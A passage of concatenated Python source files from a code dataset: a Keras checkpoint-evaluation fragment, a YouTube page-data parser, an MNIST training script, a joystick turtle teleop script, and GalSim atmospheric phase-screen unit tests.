modelの生成\n model_path = os.path.join(work_path, 'ckpt_model.h5')\n self.net_cls.get_generator().save(model_path)\n\n # 処理する画像リストの生成\n param_csv_path = work_path + '/param.csv'\n img_csv_path = work_path + '/img.csv'\n\n if self.standardization_csv_path is None:\n s_csv_path = 'None'\n\n with open(param_csv_path, 'w') as f:\n writer = csv.writer(f, lineterminator='\\n')\n writer.writerow(['model_h', 'model_w', 'padding', 'model_path', 'fin_activate',\n 'standardization_csv_path', 'standardization', 'work_dirname', 'work_path',])\n writer.writerow([self.model_h, self.model_w, self.net_cls.get_padding(),\n model_path, self.fin_activate,\n s_csv_path, self.standardization,\n work_dirname, work_path,])\n\n flg = False\n with open(img_csv_path, 'w') as f:\n writer = csv.writer(f, lineterminator='\\n')\n writer.writerow(['img_path', 'ans_path'])\n\n for img_index in range(len(img_path_set)):\n csv_file = csv_file_names[img_index]\n df = 
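The examples above never show how `attach_method` works internally. One plausible mechanism — capturing the function's source and shipping it in the Lambda payload, with the remote side binding it to the webdriver — sketched as a toy. This is an assumption for illustration only, not the chromeless library's real implementation:

```python
# Toy stand-in for one plausible attach_method mechanism: capture the
# function source with inspect, build the Lambda payload lazily on
# attribute access. An assumption for illustration, not chromeless's code.
import inspect


class ChromelessSketch:
    def __init__(self, url, apikey):
        self.url, self.apikey = url, apikey
        self._methods = {}

    def attach_method(self, func):
        self._methods[func.__name__] = inspect.getsource(func)

    def __getattr__(self, name):
        # Only reached when normal attribute lookup fails, i.e. for
        # attached methods.
        if name in self._methods:
            def invoke(*args, **kwargs):
                # A real client would POST this to the API Gateway endpoint.
                return {"code": self._methods[name], "invoke": name,
                        "args": args, "kwargs": kwargs}
            return invoke
        raise AttributeError(name)
```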
pd.read_csv(csv_file)\n if step in df['step'].values:\n continue\n flg = True\n writer.writerow([\n img_path_set[img_index],\n ans_path_set[img_index], \n ])\n # 実行\n # if flg:\n subprocess.call('python ' + work_dirname + '/eva.py ' + param_csv_path + ' ' + img_csv_path)\n\n","sub_path":"20210313/func/old/EvaCkpt.py","file_name":"EvaCkpt.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"188197499","text":"#! /usr/bin/python3\n# coding: utf-8\n\nimport json\n\nclass ytVideoInfo(object):\n\t\n\tdef __init__(self, VideoInfoRowData):\n\t\t# VideoInfoRowData is str\n\t\t\n\t\tself.ytInitialData = ytInitialData()\n\t\tself.ytsetconfig = ytsetconfig()\n\t\tself.ytplayerconfig = ytplayerconfig()\n\t\t\n\t\t\n\t\t\t\n\nclass ytInitialData(object):\n\tdef __init__(self, RowData):\n\t\t\n\t\tself.obj = RowData\n\t\t\n\t\tself.parseDatas = {\n\t\t\t'nextRowVideolist': {0: 'playerOverlays', 1:'playerOverlayRenderer', 2:'endScreen', 3:'watchNextEndScreenRenderer', 4:'results'},\n\t\t}\n\t\t\t\n\t\t\t\n\tdef parse(self):\n\t\t\n\t\tfor k, v in self.parseDatas.items():\n\t\t\tgetdata = None\n\t\t\tfor i in sorted(v.keys()):\n\t\t\t\tif i == 0:\n\t\t\t\t\tgetdata = self.obj[v[i]]\n\t\t\t\telse:\n\t\t\t\t\tgetdata = getdata[v[i]]\n\t\t\t\n\t\t\tsetattr(self, k, getdata)\n\t\n\tdef getVideoInfo(self):\n\t\t\n\t\tvideos = []\n\t\tfor row in getattr(self, 'nextRowVideolist'):\n\t\t\tvideo = Video(row)\n\t\t\tif 'ID' in dir(video):\n\t\t\t\tvideos.append(video)\n\t\t\t\n\t\tsetattr(self, 'Videos', videos)\n\t\t\n\t\t\nclass Video(object):\n\t\n\tdef __init__(self, Row):\n\t\t\n\t\turl = 'https://www.youtube.com'\n\t\t\n\t\tif not \"endScreenVideoRenderer\" in Row.keys():\n\t\t\treturn None\n\t\t\t\n\t\t\n\t\tself.ID = Row[\"endScreenVideoRenderer\"][\"videoId\"]\n\t\tself.title = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"title\"][\"simpleText\"]\n\t\tself.href = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"navigationEndpoint\"][\"commandMetadata\"]\\\n\t\t[\"webCommandMetadata\"][\"url\"]\n\t\tself.URL = url + self.href\n\t\tself.accessLabel = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"title\"][\"accessibility\"][\"accessibilityData\"]\\\n\t\t[\"label\"]\n\t\tself.view = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"shortViewCountText\"][\"simpleText\"]\n\t\tself.channel = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"shortBylineText\"][\"runs\"][0][\"text\"]\n\t\tself.channelID = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"shortBylineText\"][\"runs\"][0][\"navigationEndpoint\"]\\\n\t\t[\"browseEndpoint\"][\"browseId\"]\n\t\tself.Upload = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"publishedTimeText\"][\"simpleText\"]\n \n\t\tif \"lengthInSeconds\" in Row[\"endScreenVideoRenderer\"].keys():\n\t\t\tself.length = Row[\"endScreenVideoRenderer\"]\\\n\t\t\t[\"lengthInSeconds\"]\n\t\telse:\n\t\t\tself.length = None\n\t\t\n\n\t\t\n\t\t\nclass ytsetconfig(object):\n\tdef __init__(self):\n\t\tself.obj = toJson(RowData)\n\t\t\n\t\tpass\n\t\t\nclass ytplayerconfig(object):\n\tdef __init__(self):\n\t\tself.obj = toJson(RowData)\n\t\t\n\t\tpass\n\ndef toJson(rowdata):\n\t\n\treturn json.loads(rowdata)\n\t\n","sub_path":"ytVideo.py","file_name":"ytVideo.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"598452364","text":"import sys\n\nimport keras\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom keras.layers import Conv2D, 
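`ytInitialData.parse()` above walks nested dicts one key at a time from an index-ordered path table; the same traversal reads more directly as a reduce over a key tuple:

```python
# The parse() walk above, rewritten as a reduce over a key path.
from functools import reduce


def dig(obj, path):
    return reduce(lambda acc, key: acc[key], path, obj)


data = {"playerOverlays": {"playerOverlayRenderer": {"endScreen": {"n": 1}}}}
assert dig(data, ("playerOverlays", "playerOverlayRenderer",
                  "endScreen", "n")) == 1
```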
MaxPooling2D\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.models import Sequential\n\nSHAPE = (28, 28, 1)\nLOUD = False\nBATCH_SIZE = 128\nEPOCHS = 12\npre_learn_weights = []\npost_learn_weights = []\nDATA_SET = 'MNIST'\n\n\ndef load_data():\n x_trn = np.load(DATA_SET + '/trainImages.npy').astype(np.float32) / 255.0\n y_trn = np.load(DATA_SET + '/trainLabels.npy').astype(np.float32)\n x_tst = np.load(DATA_SET + '/testImages.npy').astype(np.float32) / 255.0\n y_tst = np.load(DATA_SET + '/testLabels.npy').astype(np.float32)\n x_trn = x_trn.reshape((len(x_trn),) + SHAPE)\n x_tst = x_tst.reshape((len(x_tst),) + SHAPE)\n return x_trn, y_trn, x_tst, y_tst\n\n\ndef extract_weights():\n arr = np.array([])\n for layer in model.layers:\n for w in layer.get_weights():\n arr = np.append(arr, np.array(w).flatten())\n return arr\n\n\ndef mrs_labeled():\n pred = model.predict_classes(x_test)\n true_class = y_test.argmax(axis=1)\n incorrects = np.nonzero(pred != true_class)\n class_examples = [(incorrects[0][true_class[incorrects] == cls]) for cls in range(10)]\n for cls_ex in class_examples:\n if len(cls_ex):\n plt.imsave(DATA_SET + '_{}.png'.format(true_class[cls_ex[0]]),\n x_test[cls_ex[0]].squeeze())\n\n\ndef plot():\n mn = min(np.min(pre_learn_weights), np.min(post_learn_weights))\n mx = max(np.max(pre_learn_weights), np.max(post_learn_weights))\n plt.hist(pre_learn_weights, label='Pre Training', range=(mn, mx), bins=1000, alpha=0.6)\n plt.hist(post_learn_weights, label='Post Training', range=(mn, mx), bins=1000, alpha=0.6)\n plt.legend()\n plt.savefig(DATA_SET + '_plt.png')\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n LOUD = sys.argv[1].lower() == 'true'\n\n x_train, y_train, x_test, y_test = load_data()\n\n model = Sequential()\n model.add(Conv2D(20, kernel_size=(3, 3), activation='relu', input_shape=SHAPE))\n model.add(Conv2D(40, kernel_size=(3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(80, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(10, activation='softmax'))\n model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adadelta(),\n metrics=['accuracy'])\n\n if LOUD:\n pre_learn_weights = extract_weights()\n\n model.fit(x_train, y_train, batch_size=BATCH_SIZE, epochs=EPOCHS, verbose=1,\n validation_data=(x_test, y_test))\n loss, acc = model.evaluate(x_test, y_test, verbose=0)\n\n print('Loss: {loss} \\t Accuracy: {acc}'.format(loss=loss, acc=acc))\n if LOUD:\n mrs_labeled()\n post_learn_weights = extract_weights()\n plot()\n","sub_path":"Problem Set 2/train_mnist.py","file_name":"train_mnist.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"544367627","text":"import ftc_field\n\nturtle = ftc_field.turtle.Turtle()\nftc_field.setup_turtle(turtle, [34.5/2, 34.5/2, 45])\nftc_field.setup_playing_field(turtle)\n\nimport joystick\n\ndx = 0\ndy = 0\ndh = 0\n\nturtle.setheading(90)\nturtle.penup()\nturtle.turtlesize(4.5, 4.5)\n\nwhile True:\n for event in joystick.poll_events():\n if event.axis == 0:\n dx = event.value\n elif event.axis == 1:\n dy = event.value\n else:\n dh = event.value\n \n turtle.setpos(turtle.pos() + (dx, -dy))\n turtle.setheading(turtle.heading() - 
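The misclassification lookup in `mrs_labeled()` from train_mnist.py above, shown with toy arrays: `np.nonzero` on a boolean mask gives the indices of wrong predictions, which are then bucketed by their true class.

```python
# The misclassification lookup from mrs_labeled(), with toy arrays.
import numpy as np

pred = np.array([0, 1, 2, 2, 1])
true_class = np.array([0, 1, 1, 2, 2])

wrong = np.nonzero(pred != true_class)[0]                # -> [2, 4]
per_class = {c: wrong[true_class[wrong] == c] for c in range(3)}

assert list(per_class[1]) == [2]   # a true "1" predicted as "2"
assert list(per_class[2]) == [4]   # a true "2" predicted as "1"
```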
dh*10)","sub_path":"Simulation/teleop.py","file_name":"teleop.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"7765133","text":"# Copyright (c) 2012-2017 by the GalSim developers team on GitHub\n# https://github.com/GalSim-developers\n#\n# This file is part of GalSim: The modular galaxy image simulation toolkit.\n# https://github.com/GalSim-developers/GalSim\n#\n# GalSim is free software: redistribution and use in source and binary forms,\n# with or without modification, are permitted provided that the following\n# conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions, and the disclaimer given in the accompanying LICENSE\n# file.\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions, and the disclaimer given in the documentation\n# and/or other materials provided with the distribution.\n#\n\nfrom __future__ import print_function\nimport os\nimport numpy as np\nfrom galsim_test_helpers import *\n\ntry:\n import galsim\n\nexcept ImportError:\n import sys\n path, filename = os.path.split(__file__)\n sys.path.append(os.path.abspath(os.path.join(path, \"..\")))\n import galsim\n\n\nimgdir = os.path.join(\".\", \"Optics_comparison_images\") # Directory containing the reference images.\npp_file = 'sample_pupil_rolled.fits'\n\ntheta0 = (0*galsim.arcmin, 0*galsim.arcmin)\n\n@timer\ndef test_aperture():\n \"\"\"Test various ways to construct Apertures.\"\"\"\n # Simple tests for constructing and pickling Apertures.\n aper1 = galsim.Aperture(diam=1.0)\n im = galsim.fits.read(os.path.join(imgdir, pp_file))\n aper2 = galsim.Aperture(diam=1.0, pupil_plane_im=im)\n do_pickle(aper1)\n do_pickle(aper2)\n # Automatically created Aperture should match one created via OpticalScreen\n aper1 = galsim.Aperture(diam=1.0)\n aper2 = galsim.Aperture(diam=1.0, lam=500, screen_list=[galsim.OpticalScreen(diam=1.0)])\n err_str = (\"Aperture created implicitly using Airy does not match Aperture created using \"\n \"OpticalScreen.\")\n assert aper1 == aper2, err_str\n\n\n@timer\ndef test_atm_screen_size():\n \"\"\"Test for consistent AtmosphericScreen size and scale.\"\"\"\n screen_size = 10.0\n screen_scale = 0.1\n atm = galsim.AtmosphericScreen(screen_size=screen_size, screen_scale=screen_scale)\n # AtmosphericScreen will preserve screen_scale, but will adjust screen_size as necessary to get\n # a good FFT size.\n assert atm.screen_scale == screen_scale\n assert screen_size < atm.screen_size < 1.5*screen_size\n np.testing.assert_equal(atm.screen_size, atm.npix * atm.screen_scale,\n \"Inconsistent atmospheric screen size and scale.\")\n\n\n@timer\ndef test_structure_function():\n \"\"\"Test that AtmosphericScreen generates approximately the right structure function for infinite\n outer scale.\n \"\"\"\n rng = galsim.BaseDeviate(4815162342)\n r0_500 = 0.2\n L0 = None\n screen_scale = 0.05\n screen_size = 100.0\n\n # Theoretical pure Kolmogorov structure function (at 500 nm!):\n D_kolm = lambda r: 6.8839 * (r/r0_500)**(5./3)\n\n atm = galsim.AtmosphericScreen(screen_size=screen_size, screen_scale=screen_scale,\n r0_500=r0_500, L0=L0, rng=rng)\n phase = atm._tab2d.table.getVals()[:-1, :-1].copy()\n phase *= 2 * np.pi / 500.0 # nm -> radians\n im = galsim.Image(phase, scale=screen_scale)\n D_sim = galsim.utilities.structure_function(im)\n\n print(\"r D_kolm D_sim\")\n for r in [0.5, 2.0, 5.0]: # Only 
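The prediction asserted by `test_structure_function` is the pure Kolmogorov phase structure function; the 6.8839 coefficient is the standard value 2(24/5 · Γ(6/5))^{5/6} ≈ 6.88:

```latex
% Kolmogorov phase structure function at 500 nm (infinite outer scale L0):
D_\phi(r) = \left\langle \left[\phi(\mathbf{x}) - \phi(\mathbf{x}+\mathbf{r})\right]^2 \right\rangle
          = 6.8839\,\left(\frac{r}{r_{0,500}}\right)^{5/3}
% with 6.8839 = 2\,\bigl(\tfrac{24}{5}\,\Gamma(\tfrac{6}{5})\bigr)^{5/6}.
```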
check values far from the screen size and scale.\n # We're only attempting to verify that we haven't missed a factor of 2 or pi or\n # something like that here, so set the rtol below to be *very* forgiving. Since the\n # structure function varies quite quickly as r**(5./3), this is still a useful test.\n # For the parameters above (including the random seed), D_kolm(r) and D_sim(r) are actually\n # consistent at about the 15% level in the test below. It's difficult to predict how\n # consistent they *should* be though, since the simulated structure function estimate is\n # sensitive to resolution and edge effects, as well as the particular realization of the\n # field.\n print(r, D_kolm(r), D_sim(r))\n np.testing.assert_allclose(D_kolm(r), D_sim(r), rtol=0.5,\n err_msg=\"Simulated structure function not close to prediction.\")\n\n\n@timer\ndef test_phase_screen_list():\n \"\"\"Test list-like behaviors of PhaseScreenList.\"\"\"\n rng = galsim.BaseDeviate(1234)\n rng2 = galsim.BaseDeviate(123)\n\n aper = galsim.Aperture(diam=1.0)\n\n ar1 = galsim.AtmosphericScreen(10, 1, alpha=0.997, L0=None, time_step=0.01, rng=rng)\n assert ar1._time == 0.0, \"AtmosphericScreen initialized with non-zero time.\"\n do_pickle(ar1)\n do_pickle(ar1, func=lambda x: x._tab2d(12.3, 45.6))\n do_pickle(ar1, func=lambda x: x._wavefront(aper.u, aper.v, None, theta0).sum())\n do_pickle(ar1, func=lambda x: x.wavefront(aper.u, aper.v, 0.0).sum())\n do_pickle(ar1, func=lambda x: np.sum(x.wavefront_gradient(aper.u, aper.v, 0.0)))\n t = np.empty_like(aper.u)\n ud = galsim.UniformDeviate(rng.duplicate())\n ud.generate(t.ravel())\n t *= 0.1 # Only do a few boiling steps\n do_pickle(ar1, func=lambda x: x.wavefront(aper.u, aper.v, t).sum())\n do_pickle(ar1, func=lambda x: np.sum(x.wavefront_gradient(aper.u, aper.v, t)))\n\n # Try seeking backwards\n assert ar1._time > 0.0\n ar1._seek(0.0)\n # But not before t=0.0\n with assert_raises(ValueError):\n ar1._seek(-1.0)\n\n # Check that L0=np.inf and L0=None yield the same thing here too.\n ar2 = galsim.AtmosphericScreen(10, 1, alpha=0.997, L0=np.inf, time_step=0.01, rng=rng)\n assert ar1 == ar2\n # Create a couple new screens with different types/parameters\n ar2 = galsim.AtmosphericScreen(10, 1, alpha=0.995, time_step=0.015, rng=rng2)\n assert ar1 != ar2\n ar3 = galsim.OpticalScreen(diam=1.0, aberrations=[0, 0, 0, 0, 0, 0, 0, 0, 0.1])\n do_pickle(ar3)\n do_pickle(ar3, func=lambda x:x._wavefront(aper.u, aper.v, None, theta0).sum())\n do_pickle(ar3, func=lambda x:np.sum(x._wavefront_gradient(aper.u, aper.v, None, theta0)))\n do_pickle(ar3, func=lambda x:x.wavefront(aper.u, aper.v).sum())\n do_pickle(ar3, func=lambda x:np.sum(x.wavefront_gradient(aper.u, aper.v)))\n atm = galsim.Atmosphere(screen_size=30.0,\n altitude=[0.0, 1.0],\n speed=[1.0, 2.0],\n direction=[0.0*galsim.degrees, 120*galsim.degrees],\n r0_500=0.15,\n rng=rng)\n atm.append(ar3)\n do_pickle(atm)\n do_pickle(atm, func=lambda x:x._wavefront(aper.u, aper.v, None, theta0).sum())\n do_pickle(atm, func=lambda x:x.wavefront(aper.u, aper.v, 0.0, theta0).sum())\n do_pickle(atm, func=lambda x:np.sum(x.wavefront_gradient(aper.u, aper.v, 0.0)))\n do_pickle(atm, func=lambda x:np.sum(x._wavefront_gradient(aper.u, aper.v, 0.0, theta0)))\n\n # testing append, extend, __getitem__, __setitem__, __delitem__, __eq__, __ne__\n atm2 = galsim.PhaseScreenList(atm[:-1]) # Refers to first n-1 screens\n assert atm != atm2\n # Append a different screen to the end of atm2\n atm2.append(ar2)\n assert atm != atm2\n # Swap the last screen in atm2 
for the one that should match atm.\n del atm2[-1]\n atm2.append(atm[-1])\n assert atm == atm2\n\n # Test building from empty PhaseScreenList\n atm3 = galsim.PhaseScreenList()\n atm3.extend(atm2)\n assert atm == atm3\n\n # Test constructing from existing PhaseScreenList\n atm4 = galsim.PhaseScreenList(atm3)\n del atm4[-1]\n assert atm != atm4\n atm4.append(atm[-1])\n assert atm == atm4\n\n # Test swap\n atm4[0], atm4[1] = atm4[1], atm4[0]\n assert atm != atm4\n atm4[0], atm4[1] = atm4[1], atm4[0]\n assert atm == atm4\n\n wf = atm._wavefront(aper.u, aper.v, None, theta0)\n wf2 = atm2._wavefront(aper.u, aper.v, None, theta0)\n wf3 = atm3._wavefront(aper.u, aper.v, None, theta0)\n wf4 = atm4._wavefront(aper.u, aper.v, None, theta0)\n\n np.testing.assert_array_equal(wf, wf2, \"PhaseScreenLists are inconsistent\")\n np.testing.assert_array_equal(wf, wf3, \"PhaseScreenLists are inconsistent\")\n np.testing.assert_array_equal(wf, wf4, \"PhaseScreenLists are inconsistent\")\n\n # Check copy\n import copy\n # Shallow copy copies by reference.\n atm5 = copy.copy(atm)\n assert atm[0] == atm5[0]\n assert atm[0] is atm5[0]\n atm._seek(1.0)\n assert atm[0]._time == 1.0, \"Wrong time for AtmosphericScreen\"\n assert atm[0] == atm5[0]\n assert atm[0] is atm5[0]\n # Deepcopy actually makes an indepedent object in memory.\n atm5 = copy.deepcopy(atm)\n assert atm[0] == atm5[0]\n assert atm[0] is not atm5[0]\n atm._seek(2.0)\n assert atm[0]._time == 2.0, \"Wrong time for AtmosphericScreen\"\n # But we still get equality, since this doesn't depend on mutable internal state:\n assert atm[0] == atm5[0]\n\n # Constructor should accept both list and indiv layers as arguments.\n atm6 = galsim.PhaseScreenList(atm[0])\n atm7 = galsim.PhaseScreenList([atm[0]])\n assert atm6 == atm7\n do_pickle(atm6, func=lambda x:x._wavefront(aper.u, aper.v, None, theta0).sum())\n do_pickle(atm6, func=lambda x:np.sum(x.wavefront_gradient(aper.u, aper.v, 0.0)))\n\n atm6 = galsim.PhaseScreenList(atm[0], atm[1])\n atm7 = galsim.PhaseScreenList([atm[0], atm[1]])\n atm8 = galsim.PhaseScreenList(atm[0:2]) # Slice returns PhaseScreenList, so this works too.\n assert atm6 == atm7\n assert atm6 == atm8\n\n # Check some actual derived PSFs too, not just phase screens. 
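The shallow-vs-deep copy assertions above hinge on standard-library copy semantics, shown here on a plain list of dicts instead of a `PhaseScreenList`:

```python
# Standard-library behavior the shallow/deep copy assertions rely on.
import copy

layers = [{"t": 0.0}]
shallow = copy.copy(layers)      # new list, same dict objects
deep = copy.deepcopy(layers)     # new list, new dict objects

layers[0]["t"] = 1.0
assert shallow[0]["t"] == 1.0    # mutation visible through the shared ref
assert deep[0]["t"] == 0.0       # independent copy untouched
```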
Use a small pupil_plane_size and\n # relatively large pupil_plane_scale to speed up the unit test.\n atm._reset()\n assert atm[0]._time == 0.0, \"Wrong time for AtmosphericScreen\"\n kwargs = dict(exptime=0.05, time_step=0.01, diam=1.1, lam=1000.0)\n psf = atm.makePSF(**kwargs)\n do_pickle(psf)\n do_pickle(psf, func=lambda x:x.drawImage(nx=20, ny=20, scale=0.1))\n\n psf2 = atm2.makePSF(**kwargs)\n psf3 = atm3.makePSF(**kwargs)\n psf4 = atm4.makePSF(**kwargs)\n\n np.testing.assert_array_equal(psf, psf2, \"PhaseScreenPSFs are inconsistent\")\n np.testing.assert_array_equal(psf, psf3, \"PhaseScreenPSFs are inconsistent\")\n np.testing.assert_array_equal(psf, psf4, \"PhaseScreenPSFs are inconsistent\")\n\n\n@timer\ndef test_frozen_flow():\n \"\"\"Test that frozen flow screen really is frozen, i.e., phase(x=0, t=0) == phase(x=v*t, t=t).\"\"\"\n rng = galsim.BaseDeviate(1234)\n vx = 1.0 # m/s\n t = 0.05 # s\n x = vx*t # 0.05 m\n dx = x\n alt = x/1000 # -> 0.00005 km; silly example, but yields exact results...\n\n screen = galsim.AtmosphericScreen(1.0, dx, alt, vx=vx, rng=rng)\n import warnings\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n aper = galsim.Aperture(diam=1, pupil_plane_size=20., pupil_plane_scale=20./dx)\n wf0 = screen._wavefront(aper.u, aper.v, None, theta0)\n dwdu0, dwdv0 = screen.wavefront_gradient(aper.u, aper.v, t=screen._time)\n screen._seek(t)\n assert screen._time == t, \"Wrong time for AtmosphericScreen\"\n wf1 = screen._wavefront(aper.u, aper.v, None, theta=(45*galsim.degrees, 0*galsim.degrees))\n dwdu1, dwdv1 = screen.wavefront_gradient(aper.u, aper.v, t=screen._time,\n theta=(45*galsim.degrees, 0*galsim.degrees))\n\n np.testing.assert_array_almost_equal(wf0, wf1, 5, \"Flow is not frozen\")\n np.testing.assert_array_almost_equal(dwdu0, dwdu1, 5, \"Flow is not frozen\")\n np.testing.assert_array_almost_equal(dwdu0, dwdu1, 5, \"Flow is not frozen\")\n\n # We should be able to rewind too.\n screen._seek(0.01)\n np.testing.assert_allclose(screen._time, 0.01, err_msg=\"Wrong time for AtmosphericScreen\")\n wf2 = screen.wavefront(aper.u, aper.v, 0.0)\n np.testing.assert_array_almost_equal(wf0, wf2, 5, \"Flow is not frozen\")\n\n\n@timer\ndef test_phase_psf_reset():\n \"\"\"Test that phase screen reset() method correctly resets the screen to t=0.\"\"\"\n rng = galsim.BaseDeviate(1234)\n # Test frozen AtmosphericScreen first\n atm = galsim.Atmosphere(screen_size=30.0, altitude=10.0, speed=0.1, alpha=1.0, rng=rng)\n aper = galsim.Aperture(diam=1.0, lam=500.0)\n wf1 = atm._wavefront(aper.u, aper.v, None, theta0)\n wf2 = atm.wavefront(aper.u, aper.v, 0.0, theta0)\n assert np.all(wf1 == wf2)\n\n atm._seek(1.0)\n wf3 = atm._wavefront(aper.u, aper.v, None, theta0)\n wf4 = atm.wavefront(aper.u, aper.v, 1.0, theta0)\n assert np.all(wf3 == wf4)\n\n # Verify that atmosphere did advance\n assert not np.all(wf1 == wf3)\n\n # Now verify that reset brings back original atmosphere\n atm._reset()\n wf3 = atm._wavefront(aper.u, aper.v, None, theta0)\n np.testing.assert_array_equal(wf1, wf3, \"Phase screen didn't reset\")\n\n # Now check with boiling, but no wind.\n atm = galsim.Atmosphere(screen_size=30.0, altitude=10.0, alpha=0.997, time_step=0.01, rng=rng)\n wf1 = atm._wavefront(aper.u, aper.v, None, theta0)\n atm._seek(0.1)\n wf2 = atm._wavefront(aper.u, aper.v, None, theta0)\n # Verify that atmosphere did advance\n assert not np.all(wf1 == wf2)\n\n # Now verify that reset brings back original atmosphere\n atm._reset()\n wf3 = atm._wavefront(aper.u, aper.v, None, 
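`test_frozen_flow` checks Taylor's frozen-flow hypothesis: the phase screen is advected rigidly by the wind, so evaluating downstream at a later time reproduces the original pattern:

```latex
% Taylor frozen-flow hypothesis exercised by test_frozen_flow: for wind
% velocity v, the screen phase satisfies
\phi(\mathbf{x},\, t) = \phi(\mathbf{x} - \mathbf{v}\,t,\; 0)
```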
theta0)\n np.testing.assert_array_equal(wf1, wf3, \"Phase screen didn't reset\")\n\n\n@timer\ndef test_phase_psf_batch():\n \"\"\"Test that PSFs generated and drawn serially match those generated and drawn in batch.\"\"\"\n import time\n NPSFs = 10\n exptime = 0.3\n rng = galsim.BaseDeviate(1234)\n atm = galsim.Atmosphere(screen_size=10.0, altitude=10.0, alpha=0.997, time_step=0.01, rng=rng)\n theta = [(i*galsim.arcsec, i*galsim.arcsec) for i in range(NPSFs)]\n\n kwargs = dict(lam=1000.0, exptime=exptime, diam=1.0)\n\n t1 = time.time()\n psfs = [atm.makePSF(theta=th, **kwargs) for th in theta]\n imgs = [psf.drawImage() for psf in psfs]\n print('time for {0} PSFs in batch: {1:.2f} s'.format(NPSFs, time.time() - t1))\n\n t2 = time.time()\n more_imgs = []\n for th in theta:\n psf = atm.makePSF(theta=th, **kwargs)\n more_imgs.append(psf.drawImage())\n print('time for {0} PSFs in serial: {1:.2f} s'.format(NPSFs, time.time() - t2))\n\n for img1, img2 in zip(imgs, more_imgs):\n np.testing.assert_array_equal(\n img1, img2,\n \"Individually generated AtmosphericPSF differs from AtmosphericPSF generated in batch\")\n\n\n@timer\ndef test_opt_indiv_aberrations():\n \"\"\"Test that aberrations specified by name match those specified in `aberrations` list.\"\"\"\n screen1 = galsim.OpticalScreen(diam=4.0, tip=0.2, tilt=0.3, defocus=0.4, astig1=0.5, astig2=0.6,\n coma1=0.7, coma2=0.8, trefoil1=0.9, trefoil2=1.0, spher=1.1)\n screen2 = galsim.OpticalScreen(diam=4.0, aberrations=[0.0, 0.0, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7,\n 0.8, 0.9, 1.0, 1.1])\n\n psf1 = galsim.PhaseScreenList(screen1).makePSF(diam=4.0, lam=500.0)\n psf2 = galsim.PhaseScreenList(screen2).makePSF(diam=4.0, lam=500.0)\n\n np.testing.assert_array_equal(\n psf1.img, psf2.img,\n \"Individually specified aberrations differs from aberrations specified as list.\")\n\n\n@timer\ndef test_scale_unit():\n \"\"\"Test that `scale_unit` keyword correctly sets the units for PhaseScreenPSF.\"\"\"\n aper = galsim.Aperture(diam=1.0)\n rng = galsim.BaseDeviate(1234)\n # Test frozen AtmosphericScreen first\n atm = galsim.Atmosphere(screen_size=30.0, altitude=10.0, speed=0.1, alpha=1.0, rng=rng)\n psf = galsim.PhaseScreenPSF(atm, 500.0, aper=aper, scale_unit=galsim.arcsec)\n im1 = psf.drawImage(nx=32, ny=32, scale=0.1, method='no_pixel')\n psf2 = galsim.PhaseScreenPSF(atm, 500.0, aper=aper, scale_unit=galsim.arcmin)\n im2 = psf2.drawImage(nx=32, ny=32, scale=0.1/60.0, method='no_pixel')\n np.testing.assert_almost_equal(\n im1.array, im2.array, 8,\n 'PhaseScreenPSF inconsistent use of scale_unit')\n\n opt_psf1 = galsim.OpticalPSF(lam=500.0, diam=1.0, scale_unit=galsim.arcsec)\n opt_psf2 = galsim.OpticalPSF(lam=500.0, diam=1.0, scale_unit='arcsec')\n assert opt_psf1 == opt_psf2, \"scale unit did not parse as string\"\n\n\n@timer\ndef test_stepk_maxk():\n \"\"\"Test options to specify (or not) stepk and maxk.\n \"\"\"\n aper = galsim.Aperture(diam=1.0)\n rng = galsim.BaseDeviate(123456)\n # Test frozen AtmosphericScreen first\n atm = galsim.Atmosphere(screen_size=30.0, altitude=10.0, speed=0.1, alpha=1.0, rng=rng)\n psf = galsim.PhaseScreenPSF(atm, 500.0, aper=aper, scale_unit=galsim.arcsec)\n stepk = psf.stepk\n maxk = psf.maxk\n\n psf2 = galsim.PhaseScreenPSF(atm, 500.0, aper=aper, scale_unit=galsim.arcsec,\n _force_stepk=stepk/1.5, _force_maxk=maxk*2.0)\n np.testing.assert_almost_equal(\n psf2.stepk, stepk/1.5, decimal=7,\n err_msg=\"PhaseScreenPSF did not adopt forced value for stepk\")\n np.testing.assert_almost_equal(\n psf2.maxk, maxk*2.0, decimal=7,\n 
